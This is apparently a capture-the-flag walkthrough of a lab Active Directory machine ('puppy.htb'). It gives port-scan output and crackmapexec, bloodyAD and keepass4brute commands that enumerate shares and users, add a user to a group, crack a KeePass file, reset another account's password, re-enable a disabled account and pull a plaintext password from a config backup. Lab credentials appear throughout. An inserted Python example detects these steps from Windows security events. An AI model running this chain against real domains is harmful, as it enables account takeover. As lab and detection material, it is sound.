Open 10.10.11.70:53
Open 10.10.11.70:88
Open 10.10.11.70:135
Open 10.10.11.70:139
Open 10.10.11.70:389
Open 10.10.11.70:445
Open 10.10.11.70:464
Open 10.10.11.70:593
Open 10.10.11.70:636
Open 10.10.11.70:2049
Open 10.10.11.70:111
Open 10.10.11.70:3269
Open 10.10.11.70:3268
Open 10.10.11.70:3260
Open 10.10.11.70:5985
Open 10.10.11.70:9389
Open 10.10.11.70:49664
Open 10.10.11.70:49667
Open 10.10.11.70:49670
Open 10.10.11.70:49669
Open 10.10.11.70:49685
Open 10.10.11.70:60683
Open 10.10.11.70:60711
crackmapexec smb 10.129.72.114 -u 'levi.james' -p 'KingofAkron2025!' --shares
Shares discovered:
ADMIN$ Remote Admin
C$ Default share
DEV DEV-SHARE for PUPPY-DEVS
IPC$ READ
NETLOGON READ
SYSVOL READ
crackmapexec smb 10.129.72.114 -u 'levi.james' -p 'KingofAkron2025!' --users
nxc smb puppy.htb -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
bloodhound-python -dc dc.puppy.htb -u 'levi.james' -p 'KingofAkron2025!' -d puppy.htb -c All -o bloodhound_results.json -ns 10.129.72.114
Adding the user to the DEV group:
bloodyAD --host 10.129.158.58 -d puppy.htb -u levi.james -p 'KingofAkron2025!' add groupMember DEVELOPERS levi.james
Retrieving the recovery.kbdx file:
Using keepass4brute:
./keepass4brute.sh recovery.kbdx wordlist.txt
Credentials found: ant.edwards : Antman2025!
bloodyAD --host 10.129.158.58 -d puppy.htb -u ant.edwards -p 'Antman2025!' get writable --detail
Password change:
bloodyAD --host "10.129.158.58" -d puppy.htb -u "ant.edwards" -p 'Antman2025!' set password "adam.silver" "Password@987"
Clearing the ACCOUNTDISABLE flag:
bloodyAD -u ant.edwards -d puppy.htb -p 'Antman2025!' --host 10.129.158.58 remove uac adam.silver -f ACCOUNTDISABLE
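Defender's view of the steps above: with User Account Management auditing enabled, the group add, the password reset and the account re-enable each leave a Security event on the domain controller (4728/4732/4756, 4724, 4722). The following is an added example, not part of the original notes, that correlates those events; the simplified field names, the sample records and the 15-minute window are assumptions.

```python
from datetime import datetime, timedelta

GROUP_ADD = {4728, 4732, 4756}   # member added to a security-enabled group
PWD_RESET, ENABLED = 4724, 4722  # password reset attempt / account enabled
WINDOW = timedelta(minutes=15)   # assumed correlation window

# Constructed sample events (fields simplified from the Security log schema;
# timestamps, helpdesk.svc and jane.doe are made up for the example).
EVENTS = [
    {"time": "2025-05-20T10:01:00", "id": 4728, "subject": "levi.james",
     "target": "DEVELOPERS", "member": "levi.james"},
    {"time": "2025-05-20T10:20:00", "id": 4724, "subject": "ant.edwards",
     "target": "adam.silver"},
    {"time": "2025-05-20T10:21:30", "id": 4722, "subject": "ant.edwards",
     "target": "adam.silver"},
    {"time": "2025-05-20T11:00:00", "id": 4724, "subject": "helpdesk.svc",
     "target": "jane.doe"},
]

def detect(events):
    """Return (rule, actor, object) tuples for the two suspicious patterns."""
    alerts, resets = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        key = (ev["subject"].lower(), ev["target"].lower())
        if ev["id"] in GROUP_ADD and ev.get("member", "").lower() == key[0]:
            # An account granting itself group membership.
            alerts.append(("self-group-add", ev["subject"], ev["target"]))
        elif ev["id"] == PWD_RESET and key[0] != key[1]:
            resets[key] = ts  # remember a reset performed on another account
        elif ev["id"] == ENABLED and key in resets and ts - resets[key] <= WINDOW:
            # Same actor reset the password, then re-enabled the account.
            alerts.append(("reset-then-enable", ev["subject"], ev["target"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

A lone help-desk reset (the last sample record) produces no alert; only the reset followed by an enable from the same actor does.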
File containing the credentials:
cat puppy/nms-auth-config.xml.bak
...
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
Thanks, Artemis Community 🛡️